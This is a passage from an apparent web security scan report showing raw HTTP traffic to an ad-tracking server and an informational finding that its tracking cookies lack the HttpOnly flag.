Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5ENBeXIMpzax3xDh/u74svh4rycdP0dAKlgosDQtsveKPUAbV6eJooUUZKyvzikWhXHnKlCMkZbB9/VH60YJGPxFnajuGncuM/dM/Uh51xPHRNkiKQlkFzeExmUiyCHp+JZor9oPRzZI0Mbu6KYqeA1IFSCpVac+IHlYHQGyWu5ISmDl59BKT6swEf9AkfwNDDGhkWPwbnVyhZyB1WbtdCNOgL1rLo31JmKhop80U9r9+w7gbPBUqdi6+aNOCntxXGEa0lT+AOh+9OmV2I5Yi+DkYM3YMd3xb2omk+SKbfwlcWpm1VDYZX6/5kh5fJXyQ0UuyTsjW0JuXe81b8+eIYhrcWsU5BhKZRNIMTtdY+xejMckEvxn9o2P/m3ieDJIm0I9cQrZSZNRQDVHBMxU2xxjy5ZGBdqmuzGNq9UM71skeHbQ22x5ql389tzqH5qIR0+2BtDJC3TVoXS7O5QjXrolunrjwuyTfiDVLYSK9FFxIlC9z+BchyFW97A0vl9EZfAu44kUi3twGM/yf01GWw==; rtc_0s-X=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=; rsiPus_8M_3="MLsXrqMOJjhv5pB0GuK8L0HP6TxvTFfsq5kDvElXUq9TwKhTQq2Ubnlep6FA0C8r6htCP2PSMq515hwVRH+xujb+G1htaTXszdeYeilTKKO1RBpCQ0t0e2bIMKUlM6bClRwGcxa+rMOmPp+zucy3NXWBXF98hg0FKNucuRxIwwaBqYDZc6gnhLN9X4uRT1JhPmDtba7wb1Ny0LW1ZiGWsLWEcpgifGwVEE5eaMuOG08OuIdls6ej9CGChzNgtGsTz2fAmDRoIO7NRmVGO2Fu0NmIJaCq7dRuHscaTiC32VFYaA+rHHFt2+c5dlmsE3GVMKlrsnqqSWAF0XEbT2iXL29pLdhi4J90vyDRyP5v7MXOQ2SnexhjoTI5feC3ziZujOSKbuHw0UZzk0vKfGo2UI5kqXNXbmSsPn/zT4VYlQl3qI1tr+mET3Lk9JcNnCeolcuo4nIUc2MVAWhQju5cRXdKnK346bdbLyeu8iNlZNnzOXbRFRhJZ76I+GGWQpAXJN3wVH7fm4hpae41QS4ebXx2GAiSPiFanMRGgxk1KKyk1R9inDRhNoP+NEFnk4QCIn0xHXRkmHQxFNYR16es6aFmKW0aXwrfjh/SleuLcnNVOtmkxOqqySqyGprAvdvjNPMG6OSZC+mmHMulB/MVrHv+J4VtHZPz4w/D7w00KwgJ9/gt0igYOwCqs7sTKGjscJmbv5uKi1CLBZ30Eert2NaeyUoIBxi2ZcULwt/pNT+BN4X/jzNpqtAsS2eWt+6k+t1yjORdslvobLE5uBgu+QoIj9KoAI/xn5tbSJNbh/pqDYFgbWX6rn8LBlqlhvNirM2Iac8nZobH2ruya7LtRtlAMmYS8q2hdLyVG/f3NGmzPJFmiflLeVXcvRJm9fM+C44nvTf3dth3bO0BRTJJRm1xoSl46U/Jt/klHQfgwwR9piSC4JNxvNN8mx9N0NDk5r1u1PzRR8T7hTV3g2qe8NSmVo7wBTml4xNMgbY+g8FGDaZ4l+tgQR7HDojsJ8vv5P8akjydW4FTJxg="; rsi_us_1000000="pUM9IzlDOAYc1U2ENgyhQng1Be7z7sLKw3jzv8rD7yutq5CDQ0Q8aZKAy3gHZduyW7zv43bzfN67P/5NzyurwWondhYeen7CWIWgxbqCdmY3a4wLoRcc/Reee8KNhj4BKp/euTN0DtKguTSkIDJ1vURStfWhCx5vdVhSw4H7sbZeLBt7cLZmC4R4RZG7fRG9H8EygB0KjrtgkS5/khqQTfWqMN+CQ7Re6dOsKbW6QCZw8Dy0JZ2jJgBRRN67npYQXY032n3+oCQ3q612E1CGsBQiuqZsfA5dZoy+uIW5D/D0r/XwM9wGw7l8HY0p4cwTPS7esM3w5lbCklgt/yNLi8Ih4fiXI7Kt2ZkX7dRZ8f8wICWkrpK2Tyqz9lk8gjR0ud3Njd4DLEQYQ52MTXD/E8REHhIOJSQiiGx50SD9yT9a5K72SQ9s6UpKFIYHCjsW0XJfDiR3UsJK+8WYg/VZOgiFw7QPdBC2+b/LiFDN627XlM3IUocsS1co3tAWOBD+rhB7D7TzR2PQGhc7PnHKe5+pg4ay4m/MuURvgG7SG6kmVhSHwZtzPCtXe9nVJwwwqzpGdKp/JcVvqe1cR+AO9nk+pZTXEGB2RR8cakFnhvB+5QR/xTMLSr1QnREn5KuWpPBdmk8ldJd6zXxtBO7Tkv97Z/BtuApaw7WZiT1IMop1RwvMrd+pw054zxi4C+4/HCdkcdis4luyl92Y1SpKqfV1PzoiVwa24vHOm917syTpes+2sYgv3uTbICeM9/Kj4fRDls47jiyDeFhZZBL5pnaLvuwzkq+KlywCU6mHoBjaCbAPlF65eyavgRSySOAWUWo/fQKkSGdsNC2QzBtlF0zyE6T2FrNMt16Pw9l+yFaLlbt0tXHwsqBkzuZWx3y0C3if2kww3wr+Z+JovuWA6Z8M1/r9DCXyrPTIVh9T9incB64/hgqfDK0QL013XAcR2XOJyAAA5vFdniF49hWrT8fR9uOV9c+kzEPBXwcXL0OMdVMUbcPkqnk+kVar3aG0PayeJwXSzuCI2pgzWkLtYs26LeQYLxmsjjHs7vcBGSpavo22HaEjA1ba4DaWCB+bFr3k7XVpbB5qwpNHRkCkZ77/UBJv01pt4XC4DAkfk3Ez7bHArrmb2X25X/l2iGpuYTDqCuAeR1whZ1F0erqLBzvaSriTPduUpkzo8ILLpKXx2R2HDOei+clQOMxb0cM3b4j2LoecLbdBeykr1KInZlRj+7F9LQMTvAHxlfg3BY6u/iHTp0QEKNmfkGRZdVhLGvY7Goafa2yt/lBjKcISAa/c80uQzhksgH6pF0cmHfqP2P02qSFNz6eMJ74hVELzN5l4DAgFOGEv7Yff4YzdAI7OC5bP5U6iQDkFclbNcZuLB/28xD4b5YEtGy2QydMcWl8nIT18I/9KHFpZKfmBXkImm6gFbB2MudKZEtB76izQuckAgZVlJ4V5t9qhXF62TO6EdyPnwlW0lCD85YsJI7JgNDWC95j/iAx5W/1ydJH20DePSoJcp093rdAxL/ln"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0s-X=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z47ss1gIQbtAeUuoVo77dVqYeIRwAKs9EYrs0bIzTjXSAI5GrN/VOLEyI1bPgjy4/AFBHtPBBeRyEWvaoNoXROdLJvi3gQYGigFiDN969IWG32y70J0kCW3oMNJVeFxoY8g/1NXHKR81f92XzRwEEaechhuI7uy7dcc9MVeFF3QxE9As3DRaWjE6nvnLfYNB3YmeW1b2PEkOddDegqkcWnYHDCwWypfg0peQ4M/ad9SnRxVGCIB95D09juPew6Bf8fuP6cf26V67hxb2rERm5uxw3CBAc5RUGL10a3XvdVmxgmsCJ59k8ObBQeB08aKGs9qVHNZ1+YNtKOdz/H4vLTpF6Q0aVLEITXMUWM0kFYEixtHIRVqHt8LLeQHn4V8XAnn3cZ8mWm2zH69ORkxf7b5b/Qtb/U1IC8Q/BkkrpQeSpcKuPgo+T3oGOhVojzET9IEWIF5MIvtitsf1jV1ZyK9BnRZEi/UOgHVjQ5y0ItR0F9Z80m448LEJ/KkFgAUw==; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:09:43 GMT; Path=/
Set-Cookie: rtc__Lvf=MLvntzE1JhpnJ5HL3vy4joSEnCpKJDT5hxKcHQSZ6JT8vuKgWFC/KkqDtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezvv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxb1QUwtrua8Ucrzg4vzJfn2PJmysGqjNTvrijT1zILLnNVboDI0g45fjWuY9xH/w4vXFZIWF8FIwEMvdWH4eH8msjyOFivcs8ZbMChEuxcQzs1OPTzt4/z2zQfg+U0r2ByE1yffOIkzJBe077NS+U+WgLoszKteBfOmbcvMjY4b9XgsSwNJl8xGNb+X2Vb6EXKUC3fnrpz0GxrzPRV0tE/ZCez3oWLso+cS20bk6a0T/YCM3Kx8YrNo+l8XEWwiR2vnYY/I4nLrE1ylDCslJBrnaYybrI4xUsRiGKkESiEmurOABMWe0iDI5s5dohjorfehJRmVPiseZIe1egNAPJ2sDREJJHaZCSOcmNOYjUv/jwzKPJAjAECbL+cBvQr9ESvkSC+oHALVBt53eN50LwfQvfY3vyqRGQhsyXLWCU9fKPqqqDyX31vUK5Qf4DHgePVycIZgR9/yiEg7u4V2XdfR1wx04lAxdkugCBLGP9bB95zGzeUfSMqL5NIh67S2zR4llWtdhHd00uXtcvIBe441RKNUAei9HPhEe0YjK2TjVyvleGWd3IH6E+wppl37hU1Qr3EGF4S7lDkTmn3efD2Lflf7XlHDRQrHKkSVbY53RWKhsxILQa+WWsXJfctWAmdEFxD4FnfOtpaXu7/9jcF43udjj1nxKAdsjyRGHIsB29cfDE+uLGeu1yIN0nZMyUb1ZxrECbXaG6AcZbZR7Yiy8e8YWXK7sBkaWr681aT6c4zOE78rzFEGQgwtz2vpVDZgB/cfPt5PumOWqJZQXSb3qUvzPyRujoYvnbiA697Iy+zNLvsrPK8GtNiV8huZT0y/9F77ml5eyclod+doU5GW1yisvw8E/aRqFw6fr23xlgtO2fYKBE0Mi++c4Go8uyHw3anmYqE3t7GgTG+hGsTuq8y0B5Q6Dpi8GSXBFbet7bbI7167eCobHEvfI/OQGgSO8RLR/kANo/suQA4r/efNzmetu77Pxs9uB/aBR5P3sDCD+crKivO87p/+F0pRzqRqaHANJ2CvdDWpF9SI7YZCS5pqD4Lt4XmKza1Vu22BCIVPxRudLr4+TIbfGcJYaUFSKN70dPk/DBKCWL8lktc5EvR/4t54LIttHGsLl+i4yL9qTdiMCVNNA1RVRVPQdPiTe9zez152RomS+7zblx4JsnVu0ptrty62RkHKO9TWHgLEWEo0zESWYENo/8ZNkdwyVeBZcMn2QlPLTUlMewbcVPQ0fCUANX0vBuKWgABd1yC1zLx5SkQ1unCrS9MAW9z0N7f1i12nKhxmvVlF2mR719fXVKDWIdcpihc3oWKs9q4M6O1SqkP762OqdSbf/mfAUmIp0GFtJ9qQ5sHJB3DOw1CN8cvvhlekXD0/HSJQCAxiquT7r2mgGRtQj017jkDUu; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:09:43 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:09:42 GMT

13.42. http://pix04.revsci.net/K10145/a3/0/3/pg.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fshoppingbasket&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z4Oss1gLZjurYNWhPokQNisncWnkGNdTd0q7tfEV6W8KYgNWe1zVP+wCE1bPgjy4/MlMu8fmb//NXar7Y6nPMFsDruxPoho+utFRzl9KlIWGX2y70JUsCX3oMTJVeFpvQWeVG9EvO7g73n2XzRwEEq30oSRzL21IY3cRpB7Vmzy1iqPeGQBJS5IhTr1vDFC8xHxrtUssduWU5dSZDN02PVSvaPDKNavJVcnziCHODolt2y79Os6T2ZV7+uWOw6Bb9lnQdZ7gG88UntJ8C1+1XhcYHsfqd+lQ7Pi+ZYIf3rQwj4PSgc/RykJQiQCXjj7Rs1RundYD6Xg9I/w0FdmmlwAsf1Ud7bhVj1rccGdiwOKwKHslwVcWlooMuuAHdQ/ysL2mjNHQ3Cr73mIpKz56ZnRkKCUpv6L2FoypfDkuoIGiYRen9fnjxJ4gwcFowoMvUN+bMu+LYYU73iVUgpezphlKRKe54pCx/I1J3qADaapZY8OFHAOQ0jQik2eXFisC4=; rtc_VOiH=MLvntzE1JhpnJ5HL3vy4joSEnCpKJDT5hxKcHQSZ6JT8vuKgWFC/KkqDtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezvv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxb1QUwtrua8Ucrzg4vzJfn2PJmysGqjNTvrijT1zILLnNVboDI0g45fjWuY9xH/w4vXFZIWF8FIwEMvdWH4eH8msjyOFivcs8ZbMChEuxcQzs1OPTzt4/z2zQfg+U0r2ByE1yffOIkzJBe077NS+U+WgLoszKteBfOmbcvMjY4b9XgsSwNJl8xGNb+X2Vb6EXKUC3fnrpz0GxrzPRV0tE/ZCez3oWLso+cS20bk6a0T/YCM3Kx8YrNo+l8XEWwiR2vnYY/I4nLrE1ylDCslJBrnaYybrI4xUsRiGKkESiEmurOABMWe0iDI5s5dohjorfehJRmVPiseZIe1egNAPJ2sDREJJHaZCSOcmNOYjUv/jwzKPJAjAECbL+cBvQr9ESvkSC+oHALVBt53eN50LwfQvfY3vyqRGQhsyXLWCU9fKPqqqDyX31vUK5Qf4DHgePVycIZgR9/yiEg7u4V2XdfR1wx04lAxdkugCBLGP9bB95zGzeUfSMqL5NIh67S2zR4llWtdhHd00uXtcvIBe441RKNUAei9HPhEe0YjK2TjVyvleGWd3IH6E+wppl37hU1Qr3EGF4S7lDkTmn3efD2Lflf7XlHDRQrHKkSVbY53RWKhsxILQa+WWsXJfctWAmdEFxD4FnfOtpaXu7/9jcF43udjj1nxKAdsjyRGHIsB29cfDE+uLGeu1yIN0nZMyUb1ZxrECbXaG6AcZbZR7Yiy8e8YWXK7sBkaWr681aT6c4zOE78rzFEGQgwtz2vpVDZgB/cfPt5PumOWqJZQXSb3qUvzPyRujoYvnbiA697Iy+zNLvsrPK8GtNiV8huZT0y/9F77ml5eyclod+doU5GW1yisvw8E/aRqFw6fr23xlgtO2fYKBE0Mi++c4Go8uyHw3anmYqE3t7GgTG+hGsTuq8y0B5Q6Dpi8GSXBFbet7bbI7167eCobHEvfI/OQGgSO8RLR/kANo/suQA4r/efNzmetu77Pxs9uB/aBR5P3sDCD+crKivO87p/+F0pRzqRqaHANJ2CvdDWpF9SI7YZCS5pqD4Lt4XmKza1Vu22BCIVPxRudLr4+TIbfGcJYaUFSKN70dPk/DBKCWL8lktc5EvR/4t54LIttHGsLl+i4yL9qTdiMCVNNA1RVRVPQdPiTe9zez152RomS+7zblx4JsnVu0ptrty62RkHKO9TWHgLEWEo0zESWYENo/8ZNkdwyVeBZcMn2QlPLTUlMewbcVPQ0fCUANX0vBuKWgABd1yC1zLx5SkQ1unCrS9MAW9z0N7f1i12nKhxmvVlF2mR719fXVKDWIdcpihc3oWKs9q4M6O1SqkP762OqdSbf/mfAUmIp0GFtJ9qQ5sHJB3DOw1CN8cvvhlekXD0/HSJQCAxiquT7r2mgGRtQj017jkDUu; rsiPus_0QhP="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn3LMq6VYMHBegA/Z8Ad/QVjxQ2jNsY0ZWD+qEDxiaWPrTwV87vSfczY/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJaL8Z3clgZfjZQfsz2Izvu3lvroVB5Qkq5knhep0fRnij2U5Rhz/Vq0pNRMfJgqDntQNUxuwMuKPi/MV/+D5eTiviMqUVLFajotuW5yMfx/XCoKPsB5uFmJ0aEeYdxcSsloefxMiWADTneb8JcFvWYtzJV7goOlW2IZx/Qe7uHD+WE8DohrAg/IzlnQvpZUk/4nt3G7S1d2+FlWbhTTptTyrmqrUJmLu9d0aNbocdAj+G6puSgbaITB3GNtmbmWvWWYkjJUdAu8bWyz1Vxk9EtoZWN3fQ4moqyebnLZSCFznuaZy3XM1MZ/6UPGDGHg0wxwW93Ub4rBq2yDHcsfYbVyvGXzLw+8b+9UUy9zqBvbciwPhJtnEN2oJ+DSWNdng4kQV2z3lppmGNciKPNvEKlkFUGDPVMAtT9lm7UtaNWxCHXgjOtDbRm+CiahJd7NZgrCqRLfB5y//J0Ufw2gwej267ae86TAzxXu2eN6qgF8dcgK67pb0uoIvBvpTfgwi1pcxvPMCci4Vi8mTRD9tCnSNVAoEbX9LWcwaPN2Q7u7zZIF0oXM2p6RhJVeuJefa0PpIftjz0TCJPHRy7zk/lxwmTTLV3ffe8wrI7wgAyuSZxJ9HAJHIAxBzEkzwZWCcYNelk2KyyMGwsgsHyGpeFNI6jLb9IUyzjd7Cykl5KXX0/7MCFYJZEI97vkjpX7jX+GTSxF6d9Kgn6FEOTsU/uJhGmj59St/BrJxgeq94hjxHaiSpeUeJhZrK/iO6EjtDgbxDO8jw3lV7nyksZqm4f+scdCX8kvHizV60UOU0QXvdGsX83/nBssHBisyFjwXrrxi+1Gcg2/RtGxPxb+aVl2g1cE4B7E+LmhICDn/O5CC+8O5HoLPPyA="; 